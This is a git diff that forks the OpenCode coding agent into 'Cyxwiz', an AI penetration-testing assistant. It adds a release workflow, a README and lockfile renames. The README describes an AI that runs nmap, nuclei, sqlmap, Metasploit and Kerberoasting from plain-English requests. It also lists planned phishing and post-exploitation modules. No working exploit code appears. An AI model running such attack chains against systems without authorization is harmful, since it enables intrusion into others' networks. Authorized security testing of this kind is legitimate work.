diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml new file mode 100644 index 00000000000..7f2f4303320 --- /dev/null +++ b/.github/workflows/release.yml @@ -0,0 +1,123 @@ +name: release + +on: + workflow_dispatch: + push: + tags: + - "*" + +concurrency: ${{ github.workflow }}-${{ github.ref }} + +permissions: + contents: write + packages: write + +jobs: + build: + strategy: + fail-fast: false + matrix: + include: + - os: ubuntu-latest + target: linux-x64 + artifact: cyxwiz-linux-x64 + - os: ubuntu-latest + target: linux-arm64 + artifact: cyxwiz-linux-arm64 + - os: macos-14 + target: darwin-x64 + artifact: cyxwiz-darwin-x64 + - os: macos-latest + target: darwin-arm64 + artifact: cyxwiz-darwin-arm64 + - os: windows-latest + target: windows-x64 + artifact: cyxwiz-windows-x64 + + runs-on: ${{ matrix.os }} + + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - run: git fetch --force --tags + + - uses: oven-sh/setup-bun@v2 + with: + bun-version: 1.3.6 + + - name: Install dependencies + run: bun install + + - name: Build CLI + working-directory: packages/opencode + run: bun run build --single + env: + OPENCODE_VERSION: ${{ github.ref_name }} + + - name: Package Linux/macOS Binary + if: runner.os != 'Windows' + run: | + cd packages/opencode/dist + DIST_DIR=$(ls -d */ | head -1) + cd "$DIST_DIR/bin" + chmod +x opencode + mv opencode cyxwiz + tar -czvf ${{ matrix.artifact }}.tar.gz cyxwiz + mv ${{ matrix.artifact }}.tar.gz $GITHUB_WORKSPACE/ + + - name: Package Windows Binary + if: runner.os == 'Windows' + shell: pwsh + run: | + cd packages/opencode/dist + $distDir = Get-ChildItem -Directory | Select-Object -First 1 + cd "$($distDir.Name)/bin" + Rename-Item opencode.exe cyxwiz.exe + Compress-Archive -Path cyxwiz.exe -DestinationPath ${{ matrix.artifact }}.zip + Move-Item ${{ matrix.artifact }}.zip $env:GITHUB_WORKSPACE/ + + - name: Upload Artifact + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.artifact }} + path: | + ${{ matrix.artifact }}.tar.gz + ${{ matrix.artifact }}.zip + if-no-files-found: error + + release: + needs: build + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + + - name: Download all artifacts + uses: actions/download-artifact@v4 + with: + path: artifacts + + - name: Prepare release assets + run: | + mkdir -p release + find artifacts -type f $ -name "*.tar.gz" -o -name "*.zip" $ -exec mv {} release/ \; + ls -la release/ + + - name: Generate checksums + run: | + cd release + sha256sum * > checksums.sha256 + cat checksums.sha256 + + - name: Create Release + uses: softprops/action-gh-release@v2 + with: + tag_name: ${{ github.ref_name }} + name: Release ${{ github.ref_name }} + draft: false + prerelease: false + generate_release_notes: true + files: release/* + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/README.md b/README.md index d0ba487402f..7959c4f4671 100644 --- a/README.md +++ b/README.md @@ -1,113 +1,787 @@ -

- - - - - - - -

The open source AI coding agent.

- - - -

+# Cyxwiz -[![OpenCode Terminal UI](packages/web/src/assets/lander/screenshot.png)](https://opencode.ai) +> **Your AI Security Partner** - Just describe what you need. No commands to memorize. No syntax to learn. + +[![Release](https://img.shields.io/github/v/release/code3hr/opencode?label=Download&color=green)](https://github.com/code3hr/opencode/releases/latest) +[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](LICENSE) +[![Platform: Linux](https://img.shields.io/badge/Platform-Linux-FCC624)](https://www.linux.org/) +[![Platform: macOS](https://img.shields.io/badge/Platform-macOS-000000)](https://www.apple.com/macos/) +[![Platform: Windows](https://img.shields.io/badge/Platform-Windows-0078D6)](https://www.microsoft.com/windows) + +--- + +## Why Cyxwiz Exists + +Security testing shouldn't require memorizing hundreds of tool flags and command syntaxes. + +Think about it: **nmap** has 130+ options. **Nuclei** has dozens of flags. **SQLMap** has over 100 parameters. Now multiply that by the 30+ tools a typical assessment requires. That's not security work - that's a memorization exercise. + +**Cyxwiz takes a different approach.** Instead of learning tool syntax, you simply describe what you want to accomplish. The AI understands your intent and figures out which tools to use, how to chain them, and how to interpret the results. + +``` +You: "check if this server is vulnerable to log4j" + +Cyxwiz: Checking 192.168.1.10 for Log4Shell vulnerability... + [Running nuclei with CVE-2021-44228 templates] + + Found: CRITICAL - Log4Shell (CVE-2021-44228) confirmed + The server is vulnerable to remote code execution via JNDI injection. + + Recommendation: Upgrade log4j to 2.17.1+ or apply mitigations immediately. +``` + +No flags to remember. No syntax to look up. Just describe what you need. + +--- + +## What Cyxwiz Does + +Cyxwiz is an AI-powered security operations assistant. You talk to it in plain English, and it: + +1. **Understands your intent** - Whether you say "scan for open ports" or "what services are running" - same result +2. **Selects the right tools** - Picks nmap, nuclei, nikto, or whatever fits the task +3. **Chains operations intelligently** - Finds a web server? Automatically suggests vulnerability checks +4. **Explains results clearly** - No raw output dumps, just actionable insights +5. **Tracks everything** - Every finding, every command, ready for your report + +### Talk, Don't Type Commands + +Here's how a real conversation with Cyxwiz looks: + +``` +You: "I need to test this web application at https://target.com" + +Cyxwiz: I'll start with reconnaissance. Let me: + 1. Check what technologies it's running + 2. Look for common vulnerabilities + 3. Test the authentication mechanisms + + Starting now... + + [After scanning] + + Here's what I found: + - Running WordPress 5.8.1 (outdated - current is 6.4) + - 3 plugins with known vulnerabilities + - Admin login page exposed at /wp-admin + - No rate limiting on login attempts + + Want me to dig deeper into any of these? + +You: "yes, check those plugin vulnerabilities" + +Cyxwiz: Looking at the vulnerable plugins... + + CRITICAL: Contact Form 7 < 5.3.2 - Unrestricted file upload + HIGH: Elementor < 3.1.2 - Authenticated XSS + MEDIUM: WooCommerce < 5.2.0 - Information disclosure + + The file upload vulnerability is serious. With a valid form submission, + an attacker could upload malicious PHP files. + + Should I generate a detailed report with remediation steps? +``` + +### What You Can Ask + +Just describe what you need in your own words: + +- *"find all the web servers on this network"* +- *"is this site vulnerable to SQL injection?"* +- *"check the SSL configuration on our servers"* +- *"what users exist in this Active Directory domain?"* +- *"test if this API has authentication issues"* +- *"show me everything you've found so far"* +- *"write up a report for the client"* + +Cyxwiz understands context too. After scanning a network, you can say *"check that Apache server for vulnerabilities"* - it knows which one you mean. + +--- + +## Why Cyxwiz? Why Not Claude CLI or Other LLM Tools? + +Yes, Claude CLI, Cursor, and other LLM tools can run commands too. So what makes Cyxwiz different? + +### The Foundation: OpenCode Agent + +Cyxwiz is built on [OpenCode](https://github.com/sst/opencode), which provides a superior agent architecture compared to generic LLM CLIs: + +``` +┌─────────────────────────────────────────────────────────────────────────────┐ +│ Generic LLM CLI vs Cyxwiz (OpenCode-based) │ +├─────────────────────────────────┬───────────────────────────────────────────┤ +│ Generic LLM CLI │ Cyxwiz │ +├─────────────────────────────────┼───────────────────────────────────────────┤ +│ General-purpose agent │ Security-focused agent │ +│ Raw command output │ Parsed, structured findings │ +│ No domain knowledge │ Security tool expertise built-in │ +│ Basic bash execution │ Specialized tool integrations │ +│ Chat history only │ Findings database + audit trail │ +│ No scope awareness │ Governance & scope enforcement │ +│ Export chat transcript │ Professional pentest reports │ +└─────────────────────────────────┴───────────────────────────────────────────┘ +``` + +### What OpenCode Gives Us (That Others Don't) + +1. **Better Agent Control** - OpenCode's architecture gives finer control over LLM behavior, tool execution, and context management than Claude CLI's generic approach + +2. **Extensible Tool Framework** - Not just "run bash commands" but structured tool definitions with typed inputs/outputs + +3. **Session Persistence** - Real session management, not just chat history + +4. **Multi-LLM Support** - Claude, GPT-4, Gemini, local models - your choice + +### What Cyxwiz Adds on Top of OpenCode + +Cyxwiz extends OpenCode with a complete security operations layer: + +``` +┌─────────────────────────────────────────────────────────────────────────────┐ +│ Cyxwiz Security Layer │ +├─────────────────────────────────────────────────────────────────────────────┤ +│ │ +│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ +│ │ Security │ │ Output │ │ Findings │ │ Report │ │ +│ │ Tools │ │ Parsers │ │ Database │ │ Engine │ │ +│ │ │ │ │ │ │ │ │ │ +│ │ nmap, nikto │ │ Extract CVEs │ │ Severity │ │ Executive │ │ +│ │ nuclei, etc │ │ Parse JSON │ │ OWASP cats │ │ Technical │ │ +│ │ 30+ tools │ │ Structure │ │ Evidence │ │ HTML/PDF/MD │ │ +│ └──────────────┘ └──────────────┘ └──────────────┘ └──────────────┘ │ +│ │ +│ ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ +│ │ Governance │ │ Scope │ │ Audit │ │ +│ │ Engine │ │ Enforcement │ │ Trail │ │ +│ │ │ │ │ │ │ │ +│ │ Policy-based │ │ Authorized │ │ Compliance │ │ +│ │ approval │ │ targets only │ │ logging │ │ +│ └──────────────┘ └──────────────┘ └──────────────┘ │ +│ │ +└─────────────────────────────────────────────────────────────────────────────┘ +``` + +#### 1. Security Tool Integrations (30+ tools) + +| Category | Tools | What Cyxwiz Adds | +|----------|-------|---------------| +| **Network** | nmap, masscan | Service detection, port classification | +| **Web** | nikto, nuclei, gobuster, ffuf | Vuln detection, directory enumeration | +| **Exploitation** | searchsploit, msfconsole | Exploit matching, payload generation | +| **AD/LDAP** | ldapsearch, smbclient | User enum, share discovery | +| **API** | Custom scanners | OpenAPI parsing, JWT analysis | +| **Wireless** | aircrack-ng, reaver | WiFi assessment | +| **Cloud** | aws-cli, az, gcloud | Misconfig detection | + +#### 2. Intelligent Output Parsers + +OpenCode gives raw output. Cyxwiz parses it: + +``` +Raw nmap output: Cyxwiz parsed output: +─────────────────── ────────────────── +PORT STATE SERVICE { +80/tcp open http ──────► "port": 80, + "service": "http", + "product": "Apache", + "version": "2.4.41", + "cves": ["CVE-2021-41773"] + } +``` + +#### 3. Findings Database + +Not just command history - structured security findings: + +- **Severity Classification**: Critical, High, Medium, Low, Info +- **OWASP Categorization**: A01-A10 mapping +- **CVE Tracking**: Automatic CVE detection and linking +- **Evidence Storage**: Screenshots, request/response pairs +- **Remediation Tracking**: Fix status, verification + +#### 4. Governance Engine + +What OpenCode doesn't have: + +- **Scope Definition**: Define authorized targets (IPs, domains, ports) +- **Scope Enforcement**: Block scans against unauthorized targets +- **Policy Rules**: Require approval for destructive actions +- **Engagement Profiles**: Different rules for different assessments + +#### 5. Audit Trail + +Compliance-ready logging: + +``` +[2024-01-15 10:23:45] SCAN_START target=192.168.1.0/24 user=analyst1 +[2024-01-15 10:23:46] SCOPE_CHECK target=192.168.1.0/24 result=AUTHORIZED +[2024-01-15 10:23:47] TOOL_EXEC tool=nmap args="-sV -sC 192.168.1.0/24" +[2024-01-15 10:25:12] FINDING_NEW id=F001 severity=CRITICAL cve=CVE-2021-41773 +[2024-01-15 10:30:00] REPORT_GEN format=HTML findings=15 +``` + +#### 6. Report Generation + +Professional deliverables, not chat exports: + +| Report Type | Contents | Format | +|-------------|----------|--------| +| **Executive** | Risk summary, business impact | HTML, PDF | +| **Technical** | Full findings, evidence, remediation | Markdown, HTML | +| **Compliance** | Audit trail, scope verification | JSON, PDF | +| **Raw Data** | Machine-readable findings | JSON | + +#### 7. Continuous Monitoring + +Schedule recurring scans with diff detection: + +- Baseline establishment +- Change detection (new ports, services, vulns) +- Alert on critical changes +- Trend tracking over time + +#### 8. Web Dashboard + +Visual interface for findings management: + +- Real-time scan progress +- Interactive findings table +- Severity charts and statistics +- Report generation UI + +### Real Example: The Difference + +**Claude CLI:** +``` +You: "scan 192.168.1.10 for vulnerabilities" + +Claude: *runs nmap* + Here's the raw output: + PORT STATE SERVICE VERSION + 80/tcp open http Apache 2.4.41 + 443/tcp open ssl/http Apache 2.4.41 + ... + +You: "what vulnerabilities does it have?" + +Claude: *runs nikto* + Here's what nikto found: + + Server: Apache/2.4.41 + + /: The anti-clickjacking X-Frame-Options header is not present + ... + + [You manually track these, decide severity, write report] +``` + +**Cyxwiz:** +``` +You: "scan 192.168.1.10 for vulnerabilities" + +Cyxwiz: [Runs nmap → parses services] + [Runs nikto → extracts findings] + [Runs nuclei → matches CVEs] + [Classifies by severity] + [Stores in findings database] + + Scan complete. Found: + + CRITICAL (1): + - CVE-2021-41773: Apache path traversal → RCE possible + + HIGH (2): + - Missing security headers (X-Frame-Options, CSP) + - SSL certificate expires in 7 days + + MEDIUM (3): + - Directory listing enabled on /uploads + - Server version disclosed + - Outdated Apache version + + All 6 findings saved with evidence. + +You: "generate report" + +Cyxwiz: [Creates executive summary] + [Includes technical details] + [Adds remediation steps] + [Exports to HTML] + + Report ready: http://localhost:4096/reports/192.168.1.10-assessment.html +``` + +### Summary + +| Feature | Claude CLI | Cyxwiz | +|---------|------------|-----| +| **Agent Architecture** | Generic | OpenCode (superior control) | +| **Tool Integration** | Bash only | 30+ security tools with parsers | +| **Output Handling** | Raw text | Structured findings | +| **Severity Classification** | Manual | Automatic (Critical→Info) | +| **CVE Matching** | Manual lookup | Automatic detection | +| **Scope Control** | None | Governance engine | +| **Audit Trail** | Chat history | Compliance-ready logs | +| **Reports** | Copy-paste chat | Professional HTML/PDF | + +**Cyxwiz = OpenCode's superior agent + Security expertise + Findings management + Governance + Reporting** + +### Why Fork OpenCode? Why Not Build a Plugin? + +| As Plugin | As Fork (Platform) | +|-----------|-------------------| +| Limited by OpenCode's roadmap | Full control | +| Can't modify core UX | Customize everything | +| "Cyxwiz for OpenCode" | "Cyxwiz" | +| Tenant | Owner | +| Single product ceiling | Platform potential | + +**Key reasons we forked:** + +1. **Governance is core, not optional** - Cyxwiz needs scope enforcement and audit logging baked into every command execution. As a plugin, we'd be bolting security onto someone else's foundation. As a fork, governance IS the foundation. + +2. **We need to modify core UX** - Security workflows require approval prompts, findings panels, and audit trails integrated into the interface. Plugins can't touch core UI. + +3. **Platform potential** - Cyxwiz isn't just a pentest tool. It's designed to expand to SOC, DevOps, NetEng domains. A plugin would forever be "Cyxwiz for OpenCode." A fork becomes "Cyxwiz" - its own platform. + +4. **Independence** - OpenCode could change direction, deprecate plugin APIs, or make decisions that conflict with security use cases. Fork = we control our destiny. + +**What we inherited (for free):** CLI/TUI framework, Multi-LLM support (Claude, GPT, Gemini), Session management, Tool execution framework, Plugin system + +**What we added:** Governance engine, Scope enforcement, Audit logging, Security tool parsers (30+), Findings management, Report generation --- -### Installation +## What Cyxwiz Is NOT + +Let's be clear about boundaries: + +### Not a Replacement for Your Judgment + +Cyxwiz is a tool, not a security expert replacement. It doesn't: +- Make risk decisions for your organization +- Determine what's in scope for your engagement +- Replace the need to understand what you're doing +- Guarantee finding every vulnerability + +**You** are the security professional. Cyxwiz handles the tedious parts so you can focus on analysis and decisions. + +### Not for Malicious Use + +Cyxwiz is built for: +- Authorized penetration testing +- Security assessments with written permission +- CTF competitions and security research +- Learning and education + +It is NOT for: +- Unauthorized access to systems +- Attacking systems you don't own or have permission to test +- Any illegal activity + +**The tools Cyxwiz uses are powerful. Use them responsibly and legally.** + +### Not a Magic Button + +Cyxwiz won't: +- Automatically hack anything +- Replace proper methodology +- Skip the need for authorization +- Make you compliant just by running it + +It's an assistant that makes security work more efficient - not a shortcut around doing things properly. + +--- + +## Installation + +### Download Pre-built Binaries + +The easiest way to get started. Download for your platform: + +| Platform | Download | +|----------|----------| +| Linux (x64) | [cyxwiz-linux-x64.tar.gz](https://github.com/code3hr/opencode/releases/latest/download/cyxwiz-linux-x64.tar.gz) | +| Linux (ARM64) | [cyxwiz-linux-arm64.tar.gz](https://github.com/code3hr/opencode/releases/latest/download/cyxwiz-linux-arm64.tar.gz) | +| macOS (Intel) | [cyxwiz-darwin-x64.tar.gz](https://github.com/code3hr/opencode/releases/latest/download/cyxwiz-darwin-x64.tar.gz) | +| macOS (Apple Silicon) | [cyxwiz-darwin-arm64.tar.gz](https://github.com/code3hr/opencode/releases/latest/download/cyxwiz-darwin-arm64.tar.gz) | +| Windows (x64) | [cyxwiz-windows-x64.zip](https://github.com/code3hr/opencode/releases/latest/download/cyxwiz-windows-x64.zip) | ```bash -# YOLO -curl -fsSL https://opencode.ai/install | bash +# Linux/macOS +tar -xzf cyxwiz-*.tar.gz +chmod +x cyxwiz +./cyxwiz -# Package managers -npm i -g opencode-ai@latest # or bun/pnpm/yarn -scoop bucket add extras; scoop install extras/opencode # Windows -choco install opencode # Windows -brew install anomalyco/tap/opencode # macOS and Linux (recommended, always up to date) -brew install opencode # macOS and Linux (official brew formula, updated less) -paru -S opencode-bin # Arch Linux -mise use -g opencode # Any OS -nix run nixpkgs#opencode # or github:anomalyco/opencode for latest dev branch +# Windows +# Extract the zip and run cyxwiz.exe ``` -> [!TIP] -> Remove versions older than 0.1.x before installing. +### Build from Source -### Desktop App (BETA) +```bash +# Install Bun (JavaScript runtime) +curl -fsSL https://bun.sh/install | bash + +# Clone and build +git clone https://github.com/code3hr/opencode.git wiz +cd wiz +bun install +bun run --cwd packages/opencode src/index.ts +``` -OpenCode is also available as a desktop application. Download directly from the [releases page](https://github.com/anomalyco/opencode/releases) or [opencode.ai/download](https://opencode.ai/download). +### Required: API Key -| Platform | Download | -| --------------------- | ------------------------------------- | -| macOS (Apple Silicon) | `opencode-desktop-darwin-aarch64.dmg` | -| macOS (Intel) | `opencode-desktop-darwin-x64.dmg` | -| Windows | `opencode-desktop-windows-x64.exe` | -| Linux | `.deb`, `.rpm`, or AppImage | +Cyxwiz needs an AI provider to work. Set one of these: ```bash -# macOS (Homebrew) -brew install --cask opencode-desktop +export ANTHROPIC_API_KEY=sk-ant-... # Claude (recommended) +# or +export OPENAI_API_KEY=sk-... # GPT-4 ``` -#### Installation Directory +### Recommended: Security Tools -The install script respects the following priority order for the installation path: +For full functionality, have these tools installed (pre-installed on Kali/Parrot): -1. `$OPENCODE_INSTALL_DIR` - Custom installation directory -2. `$XDG_BIN_DIR` - XDG Base Directory Specification compliant path -3. `$HOME/bin` - Standard user binary directory (if exists or can be created) -4. `$HOME/.opencode/bin` - Default fallback +- **nmap** - Network scanning +- **nuclei** - Vulnerability scanning +- **nikto** - Web server scanning +- **gobuster** - Directory enumeration +- **sqlmap** - SQL injection testing + +Don't have them? Cyxwiz will tell you when it needs something. + +--- + +## Architecture + +``` +┌─────────────────────────────────────────────────────────────────────────────┐ +│ YOU (Security Professional) │ +│ │ +│ "scan this network" "check for vulnerabilities" "generate report" │ +└──────────────────────────────────┬───────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────────────────────────────────┐ +│ CYXWIZ │ +│ ┌─────────────────────────────────────────────────────────────────────┐ │ +│ │ AI Engine (Claude/GPT) │ │ +│ │ │ │ +│ │ • Understands natural language intent │ │ +│ │ • Plans tool sequences │ │ +│ │ • Interprets results │ │ +│ │ • Explains findings │ │ +│ └─────────────────────────────────────────────────────────────────────┘ │ +│ │ │ +│ ▼ │ +│ ┌─────────────────────────────────────────────────────────────────────┐ │ +│ │ Tool Orchestration │ │ +│ │ │ │ +│ │ Network Web API AD Reporting │ │ +│ │ Scanner Scanner Scanner Scanner Engine │ │ +│ └─────────────────────────────────────────────────────────────────────┘ │ +│ │ │ +└───────────────────────────────────┼──────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────────────────────────────────┐ +│ Security Tools (Kali/Parrot) │ +│ │ +│ nmap nuclei nikto gobuster sqlmap smbclient ldapsearch │ +│ │ +└─────────────────────────────────────────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────────────────────────────────────────────────────────────┐ +│ TARGET SYSTEMS │ +│ (With your authorization) │ +└─────────────────────────────────────────────────────────────────────────────┘ +``` + +### Data Flow + +``` +┌──────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐ +│ Intent │ ──▶ │ Plan │ ──▶ │ Execute │ ──▶ │ Findings │ +│ │ │ │ │ │ │ │ +│ "scan │ │ 1. nmap │ │ Run each │ │ Store & │ +│ for web │ │ 2. nikto │ │ tool in │ │ classify │ +│ vulns" │ │ 3. nuclei│ │ sequence │ │ results │ +└──────────┘ └──────────┘ └──────────┘ └──────────┘ + │ + ▼ + ┌──────────┐ + │ Report │ + │ │ + │ Generate │ + │ HTML/PDF │ + └──────────┘ +``` + +--- + +## Running Modes + +Cyxwiz offers multiple interfaces to fit your workflow: + +``` +┌─────────────────────────────────────────────────────────────────┐ +│ INTERFACES │ +├─────────────────┬───────────────────┬───────────────────────────┤ +│ Terminal │ Web Server │ Dashboard │ +│ (Default) │ (--server) │ (Development) │ +├─────────────────┼───────────────────┼───────────────────────────┤ +│ ./cyxwiz │ ./cyxwiz --server│ bun run dashboard │ +│ │ │ │ +│ Interactive │ http://localhost │ http://localhost:5173 │ +│ CLI prompt │ :4096 │ (proxies to :4096) │ +│ │ │ │ +│ Best for: │ Best for: │ Best for: │ +│ Quick tasks, │ Team access, │ Development, │ +│ scripting │ remote work │ customization │ +└─────────────────┴───────────────────┴───────────────────────────┘ +``` + +### Terminal (Default) + +```bash +./cyxwiz +``` + +Interactive command-line interface. Type naturally and see results directly. + +### Web Server (Port 4096) + +```bash +./cyxwiz --server +``` + +Opens a web interface at **http://localhost:4096**. Features: +- Same AI assistant in a browser +- Real-time scan progress +- Interactive findings table +- Report viewing and export + +### Dashboard (Port 5173 - Development) ```bash -# Examples -OPENCODE_INSTALL_DIR=/usr/local/bin curl -fsSL https://opencode.ai/install | bash -XDG_BIN_DIR=$HOME/.local/bin curl -fsSL https://opencode.ai/install | bash +cd packages/opencode/src/dashboard +bun run dev +``` + +Development dashboard at **http://localhost:5173**. For contributors extending Cyxwiz. + +### Web Reports + +Reports are served through the web interface: + +``` +You: "generate a report" + +Cyxwiz: Report generated! + View at: http://localhost:4096/reports/assessment-2024-01-15.html ``` -### Agents +Features: +- Interactive severity charts +- Sortable findings table +- Evidence screenshots +- Export to PDF/HTML/Markdown + +--- + +## How It Works -OpenCode includes two built-in agents you can switch between with the `Tab` key. +### 1. You Describe, Cyxwiz Executes -- **build** - Default, full access agent for development work -- **plan** - Read-only agent for analysis and code exploration - - Denies file edits by default - - Asks permission before running bash commands - - Ideal for exploring unfamiliar codebases or planning changes +``` +You: "find subdomains for example.com" + +Cyxwiz: I'll enumerate subdomains using multiple methods... -Also, included is a **general** subagent for complex searches and multistep tasks. -This is used internally and can be invoked using `@general` in messages. + Found 47 subdomains: + - api.example.com (192.168.1.10) + - mail.example.com (192.168.1.11) + - dev.example.com (192.168.1.12) + - staging.example.com (192.168.1.13) + [... and 43 more] + + Notable: dev and staging are exposed to the internet. + Want me to scan these for vulnerabilities? +``` -Learn more about [agents](https://opencode.ai/docs/agents). +### 2. Cyxwiz Remembers Context -### Documentation +``` +You: "scan the staging server" + +Cyxwiz: Scanning staging.example.com (192.168.1.13)... + + [Cyxwiz remembers this from the previous subdomain scan] +``` + +### 3. Findings Are Tracked + +``` +You: "what have we found so far?" -For more info on how to configure OpenCode [**head over to our docs**](https://opencode.ai/docs). +Cyxwiz: Current findings for example.com assessment: + + CRITICAL (2): + - SQL injection on api.example.com/users + - Exposed admin panel on staging.example.com + + HIGH (5): + - Outdated TLS on mail.example.com + - Missing security headers (4 instances) + + MEDIUM (8): + [...] + + Total: 2 critical, 5 high, 8 medium, 12 low findings +``` + +### 4. Reports When You're Ready + +``` +You: "generate a report for the client" + +Cyxwiz: Generating executive report... + + Created: example-com-assessment-2024-01-15.html + + Includes: + - Executive summary + - Risk ratings + - All findings with evidence + - Remediation recommendations + - Technical appendix +``` + +--- -### Contributing +## Capabilities -If you're interested in contributing to OpenCode, please read our [contributing docs](./CONTRIBUTING.md) before submitting a pull request. +### Network Security +- Port scanning and service detection +- Network mapping and host discovery +- Protocol-specific testing (SMB, SNMP, DNS, LDAP) +- Credential testing and password auditing -### Building on OpenCode +### Web Application Security +- Vulnerability scanning (OWASP Top 10) +- Directory and file enumeration +- SSL/TLS configuration analysis +- CMS vulnerability detection (WordPress, Drupal, etc.) -If you are working on a project that's related to OpenCode and is using "opencode" as a part of its name; for example, "opencode-dashboard" or "opencode-mobile", please add a note to your README to clarify that it is not built by the OpenCode team and is not affiliated with us in any way. +### API Security +- OpenAPI/Swagger discovery and parsing +- Authentication bypass testing +- Injection testing (SQL, NoSQL, Command) +- JWT analysis and manipulation -### FAQ +### Active Directory +- User and group enumeration +- Kerberoasting and AS-REP roasting +- Trust relationship mapping +- Privilege escalation path finding -#### How is this different from Claude Code? +### Reporting +- Executive summaries (HTML/PDF) +- Technical reports (Markdown) +- Raw data export (JSON) +- Evidence preservation + +--- + +## Platform Support + +| Distribution | Status | Notes | +|--------------|--------|-------| +| **Kali Linux** | Fully Supported | All tools pre-installed | +| **Parrot OS** | Fully Supported | All tools pre-installed | +| **Ubuntu/Debian** | Supported | Install tools via apt | +| **Arch Linux** | Supported | Install tools via pacman | +| **macOS** | Supported | Install tools via homebrew | +| **Windows** | Supported | Install tools via chocolatey/manual | + +--- + +## Project Status + +Cyxwiz is under active development. Current capabilities: + +| Module | Status | Description | +|--------|--------|-------------| +| Core Framework | Complete | AI interaction, session management | +| Network Scanning | Complete | Nmap integration, service detection | +| Web Scanning | Complete | Nikto, Nuclei, Gobuster, SQLMap | +| API Security | Complete | OpenAPI, GraphQL, JWT analysis | +| Active Directory | Complete | User enum, Kerberoasting | +| Reporting | Complete | Multiple formats, evidence | +| Cloud Security | In Progress | AWS, Azure, GCP scanning | +| CI/CD Security | In Progress | Pipeline security analysis | +| Container Security | Planned | Docker, Kubernetes | + +--- + +## Documentation + +### Core Docs +| Document | Description | +|----------|-------------| +| [PROJECT.md](docs/PROJECT.md) | Platform architecture and vision | +| [PENTEST.md](docs/PENTEST.md) | Pentest module overview | +| [GOVERNANCE.md](docs/GOVERNANCE.md) | Policy and scope enforcement | +| [TODO.md](docs/TODO.md) | Development roadmap | +| [COMPARISON.md](docs/COMPARISON.md) | How Cyxwiz compares to other tools | + +### Module Documentation (Phases) +| Phase | Module | Description | +|-------|--------|-------------| +| [03](docs/PHASE03-pentest-agent-mvp.md) | Pentest Agent MVP | Core scanning foundation | +| [04](docs/PHASE04-multi-tool-parsers.md) | Multi-Tool Parsers | Nikto, Nuclei, Gobuster parsers | +| [05](docs/PHASE05-report-generation.md) | Report Generation | HTML, PDF, Markdown reports | +| [06](docs/PHASE06-continuous-monitoring.md) | Continuous Monitoring | Scheduled scans, diff detection | +| [07](docs/PHASE07-exploit-framework.md) | Exploit Framework | Metasploit, Searchsploit integration | +| [08](docs/PHASE08-web-app-scanner.md) | Web App Scanner | OWASP Top 10, crawling | +| [09](docs/PHASE09-api-security-scanner.md) | API Security | OpenAPI, GraphQL, JWT testing | +| [10](docs/PHASE10-network-infrastructure.md) | Network Infrastructure | SMB, SNMP, DNS, LDAP | +| [11](docs/PHASE11-cloud-security.md) | Cloud Security | AWS, Azure, GCP scanning | +| [12](docs/PHASE12-container-security.md) | Container Security | Docker, Kubernetes, CVE lookup | +| [13](docs/PHASE13-mobile-app-scanner.md) | Mobile App Scanner | Android/iOS analysis | +| [14](docs/PHASE14-wireless-scanner.md) | Wireless Scanner | WiFi security testing | +| [15](docs/PHASE15-social-engineering.md) | Social Engineering | Phishing, pretexting toolkit | +| [16](docs/PHASE16-post-exploitation.md) | Post-Exploitation | Privilege escalation, persistence | +| [17](docs/PHASE17-reporting-dashboard.md) | Reporting Dashboard | Web UI for findings | +| [18](docs/PHASE18-cicd-security.md) | CI/CD Security | Pipeline security analysis | + +--- + +## Contributing + +Contributions welcome! See [CONTRIBUTING.md](CONTRIBUTING.md). + +--- + +## Security + +Found a security issue? See [SECURITY.md](SECURITY.md). + +--- + +## License + +MIT License - See [LICENSE](LICENSE) + +--- -It's very similar to Claude Code in terms of capability. Here are the key differences: +## Acknowledgments -- 100% open source -- Not coupled to any provider. Although we recommend the models we provide through [OpenCode Zen](https://opencode.ai/zen); OpenCode can be used with Claude, OpenAI, Google or even local models. As models evolve the gaps between them will close and pricing will drop so being provider-agnostic is important. -- Out of the box LSP support -- A focus on TUI. OpenCode is built by neovim users and the creators of [terminal.shop](https://terminal.shop); we are going to push the limits of what's possible in the terminal. -- A client/server architecture. This for example can allow OpenCode to run on your computer, while you can drive it remotely from a mobile app. Meaning that the TUI frontend is just one of the possible clients. +- [OpenCode](https://github.com/sst/opencode) - The foundation we built upon +- [Anthropic](https://anthropic.com) - Claude AI +- The security community for the amazing open-source tools --- -**Join our community** [Discord](https://discord.gg/opencode) | [X.com](https://x.com/opencode) +**Cyxwiz** - *Security testing should be about security, not syntax.* diff --git a/bun.lock b/bun.lock index 0c1a8bb0674..3272d61ab89 100644 --- a/bun.lock +++ b/bun.lock @@ -249,10 +249,10 @@ }, }, "packages/opencode": { - "name": "opencode", + "name": "cyxwiz", "version": "1.1.21", "bin": { - "opencode": "./bin/opencode", + "cyxwiz": "./bin/cyxwiz", }, "dependencies": { "@actions/core": "1.11.1", @@ -306,6 +306,7 @@ "decimal.js": "10.5.0", "diff": "catalog:", "fuzzysort": "3.1.0", + "glob": "10.4.5", "gray-matter": "4.0.3", "hono": "catalog:", "hono-openapi": "catalog:", @@ -324,6 +325,7 @@ "vscode-jsonrpc": "8.2.1", "web-tree-sitter": "0.25.10", "xdg-basedir": "5.1.0", + "yaml": "2.7.0", "yargs": "18.0.0", "zod": "catalog:", "zod-to-json-schema": "3.24.5", @@ -474,7 +476,7 @@ }, "devDependencies": { "@types/node": "catalog:", - "opencode": "workspace:*", + "cyxwiz": "workspace:*", "typescript": "catalog:", }, }, @@ -2225,6 +2227,8 @@ "csstype": ["csstype@3.2.3", "", {}, "sha512-z1HGKcYy2xA8AGQfwrn0PAy+PB7X/GSj3UVJW9qKyn43xWa+gl5nXmU4qqLMRzWVLFC8KusUX8T/0kCiOYpAIQ=="], + "cyxwiz": ["cyxwiz@workspace:packages/opencode"], + "data-uri-to-buffer": ["data-uri-to-buffer@4.0.1", "", {}, "sha512-0R9ikRb668HB7QDxT1vkpuUBtqc53YyAwMwGeUFKRojY/NWKvdZ+9UYtRfGmhqNbRkTSVpMbmyhXipFFv2cb/A=="], 